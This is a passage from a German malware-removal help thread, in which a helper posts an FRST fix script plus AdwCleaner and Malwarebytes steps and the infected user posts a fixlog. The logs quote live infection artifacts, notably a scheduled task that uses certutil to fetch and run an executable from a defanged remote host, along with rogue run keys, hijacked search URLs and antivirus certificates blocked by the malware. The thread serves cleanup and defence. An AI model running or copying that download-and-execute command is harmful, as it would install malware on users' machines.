    2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
    2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
    2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
    2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
    2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
    2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
    2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
    2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
    2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
    2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
    2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
    2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
    2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
    2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
    2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
    2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
    2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
    2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
    2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
    ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
    C:\Windows\system32\mcicda64.dll
    Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
    C:\Program Files\Social Software
    Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
    C:\Program Files\SystemaRev
    Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
    Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
    Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
    C:\Program Files (x86)\nodejs
    Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
    Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
    Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
    Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
    Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
    Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
    Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
    C:\Program Files\Reimage
    Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
    C:\ProgramData\Iostream.exe
    ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
    AlternateDataStreams: C:\ProgramData:NT [40]
    AlternateDataStreams: C:\ProgramData:NT2 [552]
    AlternateDataStreams: C:\Users\All Users:NT [40]
    AlternateDataStreams: C:\Users\All Users:NT2 [552]
    AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
    AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
    AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
    AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
    AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
    AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
    AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
    AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
    AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
    Unlock: C:\Windows\system32\Drivers\etc\hosts
    C:\Windows\system32\Drivers\etc\hosts
    Hosts:
    VirusTotal: C:\Windows\system32\ntkrnlmp.exe
    VirusTotal: C:\Windows\system32\osloader.exe
    VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
    Folder: C:\Windows\rss
    ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
    RemoveProxy:
    CMD: ipconfig /flushdns
    CMD: netsh winsock reset
    EmptyTemp:
    End::
  • Starte nun FRST und klicke direkt den Entfernen Button. Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich die FRST/FRST64.exe befindet.
  • Gegebenenfalls muss dein Rechner dafür neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.






Schritt 2
Downloade Dir bitte AdwCleaner auf deinen Desktop (Bebilderte Anleitung).
  • Schließe alle offenen Programme und Browser.
  • Starte die adwcleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
  • Klicke auf Einstellungen, scrolle nach unten und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • IFEO-Schlüssel löschen
    • Firewall wiederherstellen
    • Tracing Schlüssel löschen
    • Prefetch-Dateien löschen
    • BITS wiederherstellen
    • Proxy wiederherstellen
    • IE-Policies wiederherstellen
    • Chrome-Policies wiederherstellen
    • Winsock wiederherstellen
  • Klicke nun auf Dashboard, dann auf Jetzt scannen und warte bis der Suchlauf abgeschlossen ist.
  • Klicke nun auf Bereinigen & Reparieren und bestätige mit Jetzt bereinigen.
  • WICHTIG:
    Sollte AdwCleaner nichts finden, klicke auf Grundlegende Reparatur ausführen und anschließend auf Jetzt bereinigen.
  • Nach dem Neustart öffnet sich AdwCleaner automatisch. Klicke auf Log-Datei ansehen.
  • Poste mir deren Inhalt der Log-Datei mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt. (xx = fortlaufende Nummer).





Schritt 3
Downloade Dir bitte Malwarebytes Anti-Malware 3 (Bebilderte Anleitung)
  • Installiere das Programm in den vorgegebenen Pfad.
  • Starte Malwarebytes' Anti-Malware (MBAM).
  • Klicke im Anschluss auf Scan, wähle den Bedrohungs-Scan aus und klicke auf Scan starten.
  • Lass am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Ausgewählte Elemente in die Quarantäne verschieben.
  • Lass deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
  • Starte MBAM nach dem Neustart, klicke auf Berichte.
  • Wähle den neuesten Scan-Bericht aus, klicke auf Bericht anzeigen und dann auf Export.
  • Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab.
  • Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.





Schritt 4
  • Starte die FRST.exe erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und drücke auf Untersuchen.
  • FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner nächsten Antwort.







Bitte poste mit deiner nächsten Antwort
  • die Logdatei des FRST-Fix,
  • die Logdatei von AdwCleaner,
  • die Logdatei von MBAM,
  • die zwei neuen Logdateien von FRST.

moinbro 31.05.2018 13:44
neu aufsetzen?
 
Mein PC ist so gut wie unbesiegbar, die maus ruckelt unvorstellbar stark, Programme brauchen mehrere Minuten bis sie sich öffnen oder reagieren.

Ich Frage mich ob es nicht mehr Sinn macht den PC neu aufzusetzen. Wichtige Daten hab ich gespeichert (extern) also habe ich kein Problem mit Datenverlust

Wenn ich die Schritte mit dem momentanen Zustand durchführen soll/muss dann brauche ich dafür womöglich 1 ganzen Tag wenn nicht sogar noch länger. Neu aufsetzen dauert ca einen halben Tag. Soll ich die Schritte durchführen oder neu aufsetzen?

cosinus 31.05.2018 14:35
nein nicht so schnell aufgeben!! ich hab schon ganz viel popcorn für diesen Thread! :heulen:

Bitte lass diesen Rechner von MKDB reinigen! :)

moinbro 31.05.2018 15:08
Also gut :/

"unbesiegbar" sollte übrigens "unbedienbar" heißen.

moinbro 31.05.2018 15:38
Liste der Anhänge anzeigen (Anzahl: 4)
Ab Schritt 2 war er wieder einigermaßen bedienbar ^^.

Beim Neustart kam diese Nachricht C:/Users/1/AppData/Local/Temp/161131Log.iniis lost

Was soll mir das sagen? (die meldung kommt von "AsusSetup", mein Mainboard ist von Asus also gehe ich mal davon aus, dass die Datei wichtig ist.)

Wenn ich richtig gezählt habe waren es insgesamt 254 Funde oder wie auch immer man Das nennt.

Danke schonmal :dankeschoen:

cosinus 31.05.2018 17:42
Damit alle die Logfiles lesen und auswerten können:

Lesestoff:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit.
Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten.
Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
  • Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.
http://www.trojaner-board.de/picture...&pictureid=307

moinbro 31.05.2018 20:23
Fixlog:
Code:
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (31-05-2018 14:13:17) Run:1
Gestartet von C:\Users\Nico\Downloads
Geladene Profile: Nico (Verfügbare Profile: Nico)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
CloseProcesses:
HKLM\...\Run: [resolve_run] => C:\Program Files (x86)\Common Files\new.bat [184 2018-05-25] ()
C:\Program Files (x86)\Common Files\new.bat
HKLM\...\Policies\Explorer\Run: [Chrome Update Helper] => C:\Users\Nico\AppData\Local\Temp\dx10r.exe
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ACHTUNG
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ACHTUNG
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ACHTUNG
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ACHTUNG
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ACHTUNG
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ACHTUNG
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [muV82mBJud.exe] => C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69\muV82mBJud.exe [394240 2018-05-27] ()
C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PLRFCKFE44692QO] => "C:\Program Files\RDH9TH3UTU\RDH9TH3UT.exe"
C:\Program Files\RDH9TH3UTU
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [2196509] => "C:\Users\Nico\AppData\Roaming\okdd3kogot1\xc1a5n52rpd.exe" /VERYSILENT
C:\Users\Nico\AppData\Roaming\okdd3kogot1
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [A4UX3F695ZAIC7C] => "C:\Program Files (x86)\eu0vb4pykb5\7CSH7.exe"
C:\Program Files (x86)\eu0vb4pykb5
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [flosdx] => rundll32.exe "C:\Users\Nico\AppData\Local\pfialx.dll",flosdx <==== ACHTUNG
C:\Users\Nico\AppData\Local\pfialx.dll
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [KDY06ILDW1UEHVJ] => "C:\Program Files\I88TDHYW3R\I88TDHYW3.exe"
C:\Program Files\I88TDHYW3R
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PatientSunset] => C:\Windows\rss\csrss.exe [3188736 2018-05-27] () <==== ACHTUNG
C:\Windows\rss\csrss.exe
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [QIJFFKRURZ.exe] => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\QIJFFKRURZ.exe
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [CloudNet] => C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-05-28] (EpicNet Inc.)
C:\Users\Nico\AppData\Roaming\EpicNet Inc
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\MountPoints2: {21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} - E:\HiSuiteDownLoader.exe
ShellExecuteHooks: Kein Name - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll [2990080 2018-03-24] ()
GroupPolicy: Beschränkung - Chrome <==== ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.de/?gws_rd=ssl
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> DefaultScope {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
FF HKLM\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}
FF Extension: ( ) - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi [2018-05-27]
FF HKLM-x32\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js [2018-05-27]
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-05-27] () [Datei ist nicht signiert] <==== ACHTUNG
C:\ProgramData\Logic Cramble
R2 MicroService; C:\Users\Nico\AppData\Local\XService\XService.dll [585216 2018-05-27] () [Datei ist nicht signiert]
C:\Users\Nico\AppData\Local\XService
S3 SystemUpdate64; C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [593920 2018-05-27] (SystemaRev) [Datei ist nicht signiert]
C:\Program Files\SystemaRev
R2 winamgr; C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe [10644480 2018-05-28] (Microsoft Corporation) [Datei ist nicht signiert] <==== ACHTUNG
R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
Unlock: C:\Windows\windefender.exe
C:\Windows\windefender.exe
R2 848d0b10145f615d9a5315f9c7921103; rundll32.exe C:\Windows\qcusolizqbhuglpw.qcus QEl [X]
C:\Windows\qcusolizqbhuglpw.qcus
S3 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [X]
S2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [X] <==== ACHTUNG
C:\ProgramData\PrefsSecure
S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [X] <==== ACHTUNG
C:\Program Files (x86)\ProxyGate
